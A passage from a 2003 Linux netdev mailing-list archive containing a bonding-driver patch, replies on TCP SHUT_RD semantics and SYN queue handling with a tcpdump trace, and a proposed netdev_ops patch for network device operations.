IH0gOw0KK3N0YXRpYyB1MzIgYXJwX3RhcmdldFtNQVhfQVJQX0lQX1RBUkdF VFNdID0geyAwLCB9IDsNCiBzdGF0aWMgaW50IGFycF9pcF9jb3VudCA9IDA7 DQogc3RhdGljIHUzMiBteV9pcCA9IDA7DQogY2hhciAqYXJwX3RhcmdldF9o d19hZGRyID0gTlVMTDsNCkBAIC0zOTMwLDcgKzM5MzAsNyBAQCBzdGF0aWMg aW50IF9faW5pdCBib25kaW5nX2luaXQodm9pZCkNCiAgICAgICAgICAgICAg ICAgICAgICAgICBhcnBfaW50ZXJ2YWwgPSAwOw0KIAkJfSBlbHNlIHsgDQog CQkJdTMyIGlwID0gaW5fYXRvbihhcnBfaXBfdGFyZ2V0W2FycF9pcF9jb3Vu dF0pOyANCi0JCQkqKHUzMiAqKShhcnBfaXBfdGFyZ2V0W2FycF9pcF9jb3Vu dF0pID0gaXA7DQorCQkJYXJwX3RhcmdldFthcnBfaXBfY291bnRdID0gaXA7 DQogCQl9DQogICAgICAgICB9DQogDQo= --202029822-1412134829-1057671633=:8183 Content-Type: TEXT/PLAIN; charset=US-ASCII; name="patch-2.5.diff" Content-Transfer-Encoding: BASE64 Content-ID: Content-Description: patch-2.5.diff Content-Disposition: attachment; filename="patch-2.5.diff" ZGlmZiAtTnVhcnAgbmV0LWRyaXZlcnMtMi41L2RyaXZlcnMvbmV0L2JvbmRp bmcvYm9uZF9tYWluLmMgbmV0LWRyaXZlcnMtMi41LWRldmVsL2RyaXZlcnMv bmV0L2JvbmRpbmcvYm9uZF9tYWluLmMNCi0tLSBuZXQtZHJpdmVycy0yLjUv ZHJpdmVycy9uZXQvYm9uZGluZy9ib25kX21haW4uYwlUdWUgSnVsICA4IDE2 
OjI1OjUwIDIwMDMNCisrKyBuZXQtZHJpdmVycy0yLjUtZGV2ZWwvZHJpdmVy cy9uZXQvYm9uZGluZy9ib25kX21haW4uYwlUdWUgSnVsICA4IDE2OjI1OjUw IDIwMDMNCkBAIC00NDMsNyArNDQzLDcgQEAgc3RydWN0IGJvbmRfcGFybV90 Ymwgew0KIA0KIHN0YXRpYyBpbnQgYXJwX2ludGVydmFsID0gQk9ORF9MSU5L X0FSUF9JTlRFUlY7DQogc3RhdGljIGNoYXIgKmFycF9pcF90YXJnZXRbTUFY X0FSUF9JUF9UQVJHRVRTXSA9IHsgTlVMTCwgfTsNCi1zdGF0aWMgdW5zaWdu ZWQgbG9uZyBhcnBfdGFyZ2V0W01BWF9BUlBfSVBfVEFSR0VUU10gPSB7IDAs IH0gOw0KK3N0YXRpYyB1MzIgYXJwX3RhcmdldFtNQVhfQVJQX0lQX1RBUkdF VFNdID0geyAwLCB9IDsNCiBzdGF0aWMgaW50IGFycF9pcF9jb3VudCA9IDA7 DQogc3RhdGljIHUzMiBteV9pcCA9IDA7DQogY2hhciAqYXJwX3RhcmdldF9o d19hZGRyID0gTlVMTDsNCkBAIC0zODExLDcgKzM4MTEsNyBAQCBzdGF0aWMg aW50IF9faW5pdCBib25kaW5nX2luaXQodm9pZCkNCiAgICAgICAgICAgICAg ICAgICAgICAgICBhcnBfaW50ZXJ2YWwgPSAwOw0KIAkJfSBlbHNlIHsgDQog CQkJdTMyIGlwID0gaW5fYXRvbihhcnBfaXBfdGFyZ2V0W2FycF9pcF9jb3Vu dF0pOyANCi0JCQkqKHUzMiAqKShhcnBfaXBfdGFyZ2V0W2FycF9pcF9jb3Vu dF0pID0gaXA7DQorCQkJYXJwX3RhcmdldFthcnBfaXBfY291bnRdID0gaXA7 DQogCQl9DQogICAgICAgICB9DQogDQo= --202029822-1412134829-1057671633=:8183-- From jmorris@intercode.com.au Tue Jul 8 08:28:21 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 08:28:27 -0700 (PDT) Received: from blackbird.intercode.com.au (IDENT:XBuZTrx4BLhOZb5Dd0N7WYhyTpLPTPpp@blackbird.intercode.com.au [203.32.101.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68FSH2x005274 for ; Tue, 8 Jul 2003 08:28:19 -0700 Received: from excalibur.intercode.com.au (excalibur.intercode.com.au [203.32.101.12]) by blackbird.intercode.com.au (8.11.6p2/8.9.3) with ESMTP id h68FRxr19399; Wed, 9 Jul 2003 01:28:00 +1000 Date: Wed, 9 Jul 2003 01:27:59 +1000 (EST) From: James Morris To: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= cc: davem@redhat.com, , Thomas Graf Subject: Re: [PATCH] IPV6: Fix BUG when appending destination options headers In-Reply-To: <20030708.221834.127574909.yoshfuji@linux-ipv6.org> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=ISO-8859-1 
X-archive-position: 3824 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jmorris@intercode.com.au Precedence: bulk X-list: netdev On Tue, 8 Jul 2003, YOSHIFUJI Hideaki / 吉藤英明 wrote: > This patch fixes BUG when pushing IPv6 destination options over an > IPv6 raw socket. Patch is based on one from Thomas Graf . Applied to bk://kernel.bkbits.net/jmorris/ipv6-2.5 - James -- James Morris From mtk-lists@gmx.net Tue Jul 8 09:09:22 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 09:09:30 -0700 (PDT) Received: from mx0.gmx.net (mx0.gmx.net [213.165.64.100]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68G9L2x006797 for ; Tue, 8 Jul 2003 09:09:22 -0700 Received: (qmail 8673 invoked by uid 0); 8 Jul 2003 16:09:15 -0000 Date: Tue, 8 Jul 2003 18:09:14 +0200 (MEST) From: mtk-lists@gmx.net To: netdev@oss.sgi.com MIME-Version: 1.0 Subject: Re: shutdown() and SHUT_RD on TCP sockets - broken? X-Priority: 3 (Normal) X-Authenticated-Sender: #0018454895@gmx.net X-Authenticated-IP: [212.18.21.202] Message-ID: <27084.1057680554@www6.gmx.net> X-Mailer: WWW-Mail 1.6 (Global Message Exchange) X-Flags: 0001 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 8bit X-archive-position: 3825 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: mtk-lists@gmx.net Precedence: bulk X-list: netdev Hello, There was no response to the note below. Is netdev the right place to raise this subject? Cheers Michael ------- Forwarded message follows ------- Date sent: Tue, 1 Jul 2003 13:23:49 +0200 (MEST) From: mtk-lists@gmx.net To: netdev@oss.sgi.com BCC to: michael.kerrisk@gmx.net Subject: shutdown() and SHUT_RD on TCP sockets - broken? Hello, I've done quite some searching, but have so far not found an answer to the question of why does the behaviour described below occur on Linux...
According to SUSv3, if we perform a shutdown(fd, SHUT_RD) on a socket, then further reads on that socket should be disabled. In the AF_UNIX domain, all is fine -- things operate as I expect. However, for TCP sockets, things are different (tested on 2.2.14, and 2.4.20):

1. If we perform a read() on the socket and there is no data, then 0 (EOF) is (immediately) returned. (This is what I expected.)

2. However, the peer can still write() to the socket, and afterwards we can read() that data from the socket, even though the reading half of the socket should be shut down. Instead of this behaviour, I expected the read() to continue to return 0 as in point 1. This is what we see for example in FreeBSD 4.8, Tru64 5.1B, and HP/UX 11.

I thought that most implementations (other than Linux) did things this way, but I've just now gone and tested things on Solaris 8, and it seems to behave in the same way as Linux.

I've read the relevant source code to confirm the anomalous behaviour described here. But, why do things happen in this way on Linux?

3. (A side point.) Looking at Stevens UNPv1, p161, there is a statement that after a SHUT_RD, "any data for a TCP socket is acknowledged and then silently discarded". This implies to me that the sender could keep on writing to the socket and never block. However, on Linux, if the peer keeps sending to a socket, then eventually (the channel is filled and) it blocks. I see that this also occurs on FreeBSD 4.8, Tru64 5.1B, HP/UX 11 and Solaris 8. Have I misunderstood Stevens, or has something changed since the implementation he described (or was his statement wrong)? (In the AF_UNIX domain on Linux, the peer gets SIGPIPE/EPIPE if it keeps writing after a local SHUT_RD.)

Thanks

Michael
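The AF_UNIX half of the report above (EOF on read() after a local SHUT_RD, EPIPE for a peer that keeps writing) can be checked with a small user-space sketch. This is only an illustration under stated assumptions: it targets Linux (MSG_NOSIGNAL is used so that the broken pipe shows up as an errno rather than a signal), and the function names read_after_shut_rd(), peer_send_errno() and unix_shut_rd_probe() are made up for this example, not taken from the thread.

```c
#include <errno.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper: shut down the read half of `local`, then read()
 * while nothing is queued. Returns read()'s result (0 means EOF), or -1
 * with errno set if shutdown() or read() fails. */
ssize_t read_after_shut_rd(int local)
{
	char buf[16];

	if (shutdown(local, SHUT_RD) < 0)
		return -1;
	return read(local, buf, sizeof(buf));
}

/* Hypothetical helper: send one byte from the peer. Returns 0 if the byte
 * was accepted, otherwise the errno value. MSG_NOSIGNAL (Linux) reports a
 * broken pipe as EPIPE instead of raising SIGPIPE. */
int peer_send_errno(int peer)
{
	if (send(peer, "x", 1, MSG_NOSIGNAL) < 0)
		return errno;
	return 0;
}

/* Run both probes on an AF_UNIX stream pair. Returns 1 if read() saw EOF
 * and the peer's send failed with EPIPE, 0 if not, -1 on setup failure. */
int unix_shut_rd_probe(void)
{
	int sv[2];
	ssize_t n;
	int err;

	if (socketpair(AF_UNIX, SOCK_STREAM, 0, sv) < 0)
		return -1;
	n = read_after_shut_rd(sv[0]);
	err = peer_send_errno(sv[1]);
	close(sv[0]);
	close(sv[1]);
	return n == 0 && err == EPIPE;
}
```

The two helpers take plain descriptors, so they could equally be pointed at a connected TCP pair to compare against points 1 to 3; no result is claimed here for that case.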
From jmorris@intercode.com.au Tue Jul 8 09:28:24 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 09:28:28 -0700 (PDT) Received: from blackbird.intercode.com.au (IDENT:qSgcuNLQOEudkYz67FgECyo3FYdtmZfn@blackbird.intercode.com.au [203.32.101.10]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68GSM2x007642 for ; Tue, 8 Jul 2003 09:28:23 -0700 Received: from excalibur.intercode.com.au (excalibur.intercode.com.au [203.32.101.12]) by blackbird.intercode.com.au (8.11.6p2/8.9.3) with ESMTP id h68GSDr19679; Wed, 9 Jul 2003 02:28:13 +1000 Date: Wed, 9 Jul 2003 02:28:12 +1000 (EST) From: James Morris To: mtk-lists@gmx.net cc: netdev@oss.sgi.com, Subject: Re: shutdown() and SHUT_RD on TCP sockets - broken? In-Reply-To: <27084.1057680554@www6.gmx.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-archive-position: 3826 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: jmorris@intercode.com.au Precedence: bulk X-list: netdev On Tue, 8 Jul 2003 mtk-lists@gmx.net wrote: > Hello, > > There was no response to the note below. Is netdev the right place to > raise this subject? Yes. I believe Alexey has some reservations about the specified behavior. - James -- James Morris From ak@suse.de Tue Jul 8 09:55:12 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 09:55:21 -0700 (PDT) Received: from Cantor.suse.de (ns.suse.de [213.95.15.193]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68GtB2x008305 for ; Tue, 8 Jul 2003 09:55:12 -0700 Received: from Hermes.suse.de (Hermes.suse.de [213.95.15.136]) by Cantor.suse.de (Postfix) with ESMTP id F19B9142AB; Tue, 8 Jul 2003 18:55:05 +0200 (MEST) Date: Tue, 8 Jul 2003 18:55:04 +0200 From: Andi Kleen To: mtk-lists@gmx.net Cc: netdev@oss.sgi.com Subject: Re: shutdown() and SHUT_RD on TCP sockets - broken? 
Message-Id: <20030708185504.385c0d55.ak@suse.de> In-Reply-To: <27084.1057680554@www6.gmx.net> References: <27084.1057680554@www6.gmx.net> X-Mailer: Sylpheed version 0.8.9 (GTK+ 1.2.10; i686-pc-linux-gnu) Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit X-archive-position: 3827 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: ak@suse.de Precedence: bulk X-list: netdev On Tue, 8 Jul 2003 18:09:14 +0200 (MEST) mtk-lists@gmx.net wrote: > 1. If we perform a read() on the socket and there is no data, then 0 > (EOF) is (immediately) returned. (This is what I expected.) > > 2. However, the peer can still write() to the socket, and afterwards > we can read() that data from the socket, even though the reading half > of the socket should be shut down. Instead of this behaviour, I > expected the read() to continue to return 0 as in point 1. This is what we > see for example in FreeBSD 4.8, Tru64 5.1B, and HP/UX 11. The problem is that it adds a new check to the input path. It's not clear how the check can be done outside the fast path (one way would be to shrink the window forcedly and drop the receiver into slow path, but that would be a severe protocol violation if the shrunk window leaks out with some ACK). I don't think it's a good idea to add a check for such an obscure situation to the fast path. > > 3. (A side point.) Looking at Stevens UNPv1, p161, there is a statement > that after a SHUT_RD, "any data for a TCP socket is acknowledged and then > silently discarded". This implies to me that the sender could keep on > writing to the socket and never block. However, on Linux, if the peer > keeps sending to a socket, then eventually (the channel is filled and) it > blocks. I see that this also occurs on FreeBSD 4.8, Tru64 5.1B, HP/UX 11 That's because the data is not discarded so the window fills. > and Solaris 8. 
Have I misunderstood Stevens, or has something changed > since the implementation he described (or was his statement wrong)? (In Probably Stevens was confused. -Andi From kuznet@ms2.inr.ac.ru Tue Jul 8 10:03:31 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 10:03:37 -0700 (PDT) Received: from dub.inr.ac.ru (dub.inr.ac.ru [193.233.7.105]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68H3R2x008828 for ; Tue, 8 Jul 2003 10:03:28 -0700 Received: (from kuznet@localhost) by dub.inr.ac.ru (8.6.13/ANK) id VAA13437; Tue, 8 Jul 2003 21:03:07 +0400 From: kuznet@ms2.inr.ac.ru Message-Id: <200307081703.VAA13437@dub.inr.ac.ru> Subject: Re: shutdown() and SHUT_RD on TCP sockets - broken? To: jmorris@intercode.com.au (James Morris) Date: Tue, 8 Jul 2003 21:03:07 +0400 (MSD) Cc: mtk-lists@gmx.net, netdev@oss.sgi.com In-Reply-To: from "James Morris" at Jul 09, 2003 02:28:12 X-Mailer: ELM [version 2.5 PL6] MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3828 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kuznet@ms2.inr.ac.ru Precedence: bulk X-list: netdev Hello! > blocks. I see that this also occurs on FreeBSD 4.8, Tru64 5.1B, > HP/UX 11 and Solaris 8. Have I misunderstood Stevens, Most likely, it is that rare case when Stevens forgot to check the statement. From viewpoint of TCP the behaviour described in Stevens' book is highly unnatural. SHUT_RD on TCP does not make any sense. > described here. But, why do things happen in this way on Linux? Actually, you could check one more thing. What does happen after freebsd 4.8 returns 0 on read()? Does it open window eventually? As you checked, all the stacks ignore SHUT_RD, when receiving data and queue it anyway. And when read()ing Linux and, apparently Solaris, prefer to return this data.
Alexey From palbrecht@qwest.net Tue Jul 8 10:26:57 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 10:27:14 -0700 (PDT) Received: from mpls-qmqp-01.inet.qwest.net (mpls-qmqp-01.inet.qwest.net [63.231.195.112]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68HQu2x010024 for ; Tue, 8 Jul 2003 10:26:56 -0700 Received: (qmail 28098 invoked by uid 0); 8 Jul 2003 17:26:55 -0000 Received: from unknown (63.231.195.5) by mpls-qmqp-01.inet.qwest.net with QMQP; 8 Jul 2003 17:26:55 -0000 Received: from 0-1pool151-16.nas8.minneapolis1.mn.us.da.qwest.net (HELO oemcomputer) (67.4.151.16) by mpls-pop-05.inet.qwest.net with SMTP; 8 Jul 2003 17:26:54 -0000 Date: Tue, 8 Jul 2003 12:23:37 -0700 Message-ID: <001401c34586$6f955e20$6801a8c0@oemcomputer> From: "Paul Albrecht" To: "Andi Kleen" Cc: niv@us.ibm.com, linux-kernel@vger.kernel.org, "netdev" References: <3F08858E.8000907@us.ibm.com.suse.lists.linux.kernel><001a01c3441c$6fe111a0$6801a8c0@oemcomputer.suse.lists.linux.kernel><3F08B7E2.7040208@us.ibm.com.suse.lists.linux.kernel><000d01c3444f$e6439600$6801a8c0@oemcomputer.suse.lists.linux.kernel><3F090A4F.10004@us.ibm.com.suse.lists.linux.kernel><001401c344df$ccbc63c0$6801a8c0@oemcomputer.suse.lists.linux.kernel> Subject: Re: question about linux tcp request queue handling MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_0011_01C3454B.C1D79260" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.00.2615.200 X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2615.200 X-archive-position: 3829 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: palbrecht@qwest.net Precedence: bulk X-list: netdev This is a multi-part message in MIME format. ------=_NextPart_000_0011_01C3454B.C1D79260 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Andi Kleen writes: > > The 4.4BSD-Lite code described in Stevens is long outdated. 
All modern > BSDs (and probably most other Unixes too) do it in a similar way to what > Nivedita described. The keywords are "syn flood attack" and "DoS". > I have attached a copy of tcpdump output for two linux systems connected over ether replaying the scenario for incoming request queue handling given in Stevens's TCP/IP Illustrated Volume 1: The Protocols. What I don't understand about the third handshake is if the server is going to send the syn/ack in response the client's initial syn then why does server repeatly ignore the subsequent ack from the client? ------=_NextPart_000_0011_01C3454B.C1D79260 Content-Type: text/plain; name="trace.txt" Content-Transfer-Encoding: quoted-printable Content-Disposition: attachment; filename="trace.txt" 01:12:09.622208 client.acme.net.1024 > server.acme.net.7777: S = 2730884988:2730884988(0) win 5840 (DF) 01:12:09.623457 server.acme.net.7777 > client.acme.net.1024: S = 1682786145:1682786145(0) ack 2730884989 win 5792 (DF) 01:12:09.623963 client.acme.net.1024 > server.acme.net.7777: . ack = 1682786146 win 5840 (DF) 01:12:11.858191 client.acme.net.1025 > server.acme.net.7777: S = 2743503110:2743503110(0) win 5840 (DF) 01:12:11.858991 server.acme.net.7777 > client.acme.net.1025: S = 1690738882:1690738882(0) ack 2743503111 win 5792 (DF) 01:12:11.859535 client.acme.net.1025 > server.acme.net.7777: . ack = 1690738883 win 5840 (DF) 01:12:13.909895 client.acme.net.1026 > server.acme.net.7777: S = 2736891141:2736891141(0) win 5840 (DF) 01:12:13.910636 server.acme.net.7777 > client.acme.net.1026: S = 1692403887:1692403887(0) ack 2736891142 win 5792 (DF) 01:12:13.911144 client.acme.net.1026 > server.acme.net.7777: . ack = 1692403888 win 5840 (DF) 01:12:17.502319 server.acme.net.7777 > client.acme.net.1026: S = 1692403887:1692403887(0) ack 2736891142 win 5792 (DF) 01:12:17.502909 client.acme.net.1026 > server.acme.net.7777: . 
ack = 1692403888 win 5840 (DF) 01:12:23.502350 server.acme.net.7777 > client.acme.net.1026: S = 1692403887:1692403887(0) ack 2736891142 win 5792 (DF) 01:12:23.502969 client.acme.net.1026 > server.acme.net.7777: . ack = 1692403888 win 5840 (DF) 01:12:35.702302 server.acme.net.7777 > client.acme.net.1026: S = 1692403887:1692403887(0) ack 2736891142 win 5792 (DF) 01:12:35.702840 client.acme.net.1026 > server.acme.net.7777: . ack = 1692403888 win 5840 (DF) 01:12:59.702343 server.acme.net.7777 > client.acme.net.1026: S = 1692403887:1692403887(0) ack 2736891142 win 5792 (DF) 01:12:59.702994 client.acme.net.1026 > server.acme.net.7777: . ack = 1692403888 win 5840 (DF) ------=_NextPart_000_0011_01C3454B.C1D79260-- From willy@www.linux.org.uk Tue Jul 8 10:52:44 2003 Received: with ECARTIS (v1.0.0; list netdev); Tue, 08 Jul 2003 10:52:56 -0700 (PDT) Received: from www.linux.org.uk (IDENT:4vBE4wuPSC5KCPsn6hIdI7xNi7UYOIOv@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h68Hqg2x010515 for ; Tue, 8 Jul 2003 10:52:43 -0700 Received: from willy by www.linux.org.uk with local (Exim 4.14) id 19ZvMY-0007KY-SR; Tue, 08 Jul 2003 17:30:42 +0100 Date: Tue, 8 Jul 2003 17:30:42 +0100 From: Matthew Wilcox To: Jeff Garzik , Arnaldo Carvalho de Melo Cc: netdev@oss.sgi.com Subject: [PATCH] netdev_ops Message-ID: <20030708163042.GL23597@parcelfarce.linux.theplanet.co.uk> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.4.1i X-archive-position: 3830 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: willy@debian.org Precedence: bulk X-list: netdev After a conversation with acme, I realised that ethtool_ops is far too narrow scope. What we need are netdev_ops. 
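The idea of a per-device table of operations, with the core checking for missing entries and sizing buffers on the driver's behalf, can be sketched in user space as follows. Everything in this block is an assumption made for illustration: toy_dev, toy_ops, toy_get_link(), toy_get_regs() and the demo_* functions are invented names, malloc() stands in for kernel allocation, and the length op here takes the device as its argument.

```c
#include <errno.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

struct toy_dev;

/* Hypothetical, cut-down ops table; a driver may leave any entry NULL. */
struct toy_ops {
	unsigned int (*get_link)(struct toy_dev *);
	size_t (*get_regs_len)(struct toy_dev *);
	void (*get_regs)(struct toy_dev *, void *buf);
};

struct toy_dev {
	const struct toy_ops *ops;
	int carrier;
};

/* Core-side wrapper: an op the driver did not provide is "not supported". */
int toy_get_link(struct toy_dev *dev, unsigned int *out)
{
	if (!dev->ops || !dev->ops->get_link)
		return -EOPNOTSUPP;
	*out = dev->ops->get_link(dev);
	return 0;
}

/* Core-side wrapper: ask the driver how much room it needs, allocate the
 * buffer in the core, then let the driver fill it. Caller frees *out. */
int toy_get_regs(struct toy_dev *dev, void **out, size_t *len)
{
	const struct toy_ops *ops = dev->ops;
	void *buf;

	if (!ops || !ops->get_regs || !ops->get_regs_len)
		return -EOPNOTSUPP;
	*len = ops->get_regs_len(dev);
	buf = malloc(*len);
	if (!buf)
		return -ENOMEM;
	ops->get_regs(dev, buf);
	*out = buf;
	return 0;
}

/* A made-up "driver" that implements every op in the table. */
static unsigned int demo_get_link(struct toy_dev *dev)
{
	return dev->carrier ? 1 : 0;
}

static size_t demo_get_regs_len(struct toy_dev *dev)
{
	(void)dev;
	return 4;
}

static void demo_get_regs(struct toy_dev *dev, void *buf)
{
	(void)dev;
	memset(buf, 0xAB, 4);	/* pretend register dump */
}

const struct toy_ops demo_ops = {
	.get_link = demo_get_link,
	.get_regs_len = demo_get_regs_len,
	.get_regs = demo_get_regs,
};

/* A "driver" that implements nothing; every wrapper should refuse it. */
const struct toy_ops empty_ops = { NULL, NULL, NULL };
```

Keeping the NULL checks and the allocation in the core wrappers means a driver only supplies the callbacks it actually supports, and no driver has to manage the temporary buffer itself.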
This patch renames the ethtool_ops to netdev_ops and fixes some other minor flaws: - add _len() ops for operations which previously had to kmalloc their own memory. - move the netdev_ops from ethtool.h to netdevice.h - makes some ops generic as requested by Jeff Garzik. I think netdev_ops is still a little too ethtool-specific; something I'd like to do is convert the parameters to be a little less ethtool-related. For example, instead of ->get_drvinfo, I'd like to see ethtool_get_drvinfo() call several methods and fill in all the data that way. But let's see what everyone thinks of this patch first ... Index: include/linux/ethtool.h =================================================================== RCS file: /var/cvs/linux-2.5/include/linux/ethtool.h,v retrieving revision 1.5 diff -u -p -r1.5 ethtool.h --- include/linux/ethtool.h 14 Jun 2003 22:16:01 -0000 1.5 +++ include/linux/ethtool.h 8 Jul 2003 15:25:49 -0000 @@ -12,6 +12,7 @@ #ifndef _LINUX_ETHTOOL_H #define _LINUX_ETHTOOL_H +#include /* This should work for both 32 and 64 bit userland. */ struct ethtool_cmd { @@ -97,7 +98,7 @@ struct ethtool_coalesce { u32 rx_max_coalesced_frames; /* Same as above two parameters, except that these values - * apply while an IRQ is being services by the host. Not + * apply while an IRQ is being serviced by the host. Not * all cards support this feature and the values are ignored * in that case. */ @@ -119,7 +120,7 @@ struct ethtool_coalesce { u32 tx_max_coalesced_frames; /* Same as above two parameters, except that these values - * apply while an IRQ is being services by the host. Not + * apply while an IRQ is being serviced by the host. Not * all cards support this feature and the values are ignored * in that case. 
*/ Index: include/linux/netdevice.h =================================================================== RCS file: /var/cvs/linux-2.5/include/linux/netdevice.h,v retrieving revision 1.14 diff -u -p -r1.14 netdevice.h --- include/linux/netdevice.h 2 Jul 2003 22:08:52 -0000 1.14 +++ include/linux/netdevice.h 8 Jul 2003 15:14:38 -0000 @@ -42,6 +42,7 @@ struct divert_blk; struct vlan_group; +struct netdev_ops; #define HAVE_ALLOC_NETDEV /* feature macro: alloc_xxxdev functions are available. */ @@ -299,6 +300,8 @@ struct net_device * See for details. Jean II */ struct iw_handler_def * wireless_handlers; + struct netdev_ops *netdev_ops; + /* * This marks the end of the "visible" part of the structure. All * fields hereafter are internal to the system, and may change at @@ -484,6 +487,102 @@ struct packet_type struct list_head list; }; +/* Some generic methods drivers may use in their netops */ +u32 netdev_op_get_link(struct net_device *dev); +u32 netdev_op_get_tx_csum(struct net_device *dev); +u32 netdev_op_get_sg(struct net_device *dev); +int netdev_op_set_sg(struct net_device *dev, u32 data); + +struct ethtool_cmd; +struct ethtool_drvinfo; +struct ethtool_regs; +struct ethtool_wolinfo; +struct ethtool_eeprom; +struct ethtool_coalesce; +struct ethtool_ringparam; +struct ethtool_pauseparam; +struct ethtool_test; +struct ethtool_gstrings; +struct ethtool_stats; + +/** + * &netdev_ops - Alter and report network device settings + * get_settings: Get device-specific settings + * set_settings: Set device-specific settings + * get_drvinfo: Report driver information + * get_regs: Get device registers + * get_wol: Report whether Wake-on-Lan is enabled + * set_wol: Turn Wake-on-Lan on or off + * get_msglevel: Report driver message level + * set_msglevel: Set driver message level + * nway_reset: Restart autonegotiation + * get_link: Get link status + * get_eeprom: Read data from the device EEPROM + * set_eeprom: Writedata to the device EEPROM + * get_coalesce: Get interrupt 
coalescing parameters + * set_coalesce: Set interrupt coalescing parameters + * get_ringparam: Report ring sizes + * set_ringparam: Set ring sizes + * get_pauseparam: Report pause parameters + * set_pauseparam: Set pause paramters + * get_rx_csum: Report whether receive checksums are turned on or off + * set_rx_csum: Turn receive checksum on or off + * get_tx_csum: Report whether transmit checksums are turned on or off + * set_tx_csum: Turn transmit checksums on or off + * get_sg: Report whether scatter-gather is enabled + * set_sg: Turn scatter-gather on or off + * self_test: Run specified self-tests + * get_strings: Return a set of strings that describe the requested objects + * phys_id: Identify the device + * get_stats: Return statistics about the device + * + * Description: + * + * Each operation is passed a &struct net_device as its first parameter. + * + * get_settings: + * @get_settings is passed an &ethtool_cmd to fill in. It returns + * an negative errno or zero. + * + * set_settings: + * @set_settings is passed an &ethtool_cmd and should attempt to set + * all the settings this device supports. It may return an error value + * if something goes wrong (otherwise 0).
+ */ +struct netdev_ops { + int (*get_settings)(struct net_device *, struct ethtool_cmd *); + int (*set_settings)(struct net_device *, struct ethtool_cmd *); + void (*get_drvinfo)(struct net_device *, struct ethtool_drvinfo *); + int (*get_regs_len)(struct ethtool_regs *); + void (*get_regs)(struct net_device *, struct ethtool_regs *, void *); + void (*get_wol)(struct net_device *, struct ethtool_wolinfo *); + int (*set_wol)(struct net_device *, struct ethtool_wolinfo *); + u32 (*get_msglevel)(struct net_device *); + void (*set_msglevel)(struct net_device *, u32); + int (*nway_reset)(struct net_device *); + u32 (*get_link)(struct net_device *); + int (*get_eeprom)(struct net_device *, struct ethtool_eeprom *); + int (*set_eeprom)(struct net_device *, struct ethtool_eeprom *); + int (*get_coalesce)(struct net_device *, struct ethtool_coalesce *); + int (*set_coalesce)(struct net_device *, struct ethtool_coalesce *); + void (*get_ringparam)(struct net_device *, struct ethtool_ringparam *); + int (*set_ringparam)(struct net_device *, struct ethtool_ringparam *); + void (*get_pauseparam)(struct net_device *, struct ethtool_pauseparam*); + int (*set_pauseparam)(struct net_device *, struct ethtool_pauseparam*); + u32 (*get_rx_csum)(struct net_device *); + int (*set_rx_csum)(struct net_device *, u32); + u32 (*get_tx_csum)(struct net_device *); + int (*set_tx_csum)(struct net_device *, u32); + u32 (*get_sg)(struct net_device *); + int (*set_sg)(struct net_device *, u32); + int (*self_test_len)(struct ethtool_test *); + void (*self_test)(struct net_device *, struct ethtool_test *, u64 *); + int (*get_strings_len)(struct ethtool_gstrings *); + void (*get_strings)(struct net_device *, struct ethtool_gstrings *, u8 *); + void (*phys_id)(struct net_device *, u32); + int (*get_stats_len)(struct ethtool_stats *); + void (*get_stats)(struct net_device *, struct ethtool_stats *, u64 *); +}; #include #include @@ -633,6 +732,7 @@ extern int netif_rx(struct sk_buff *skb #define 
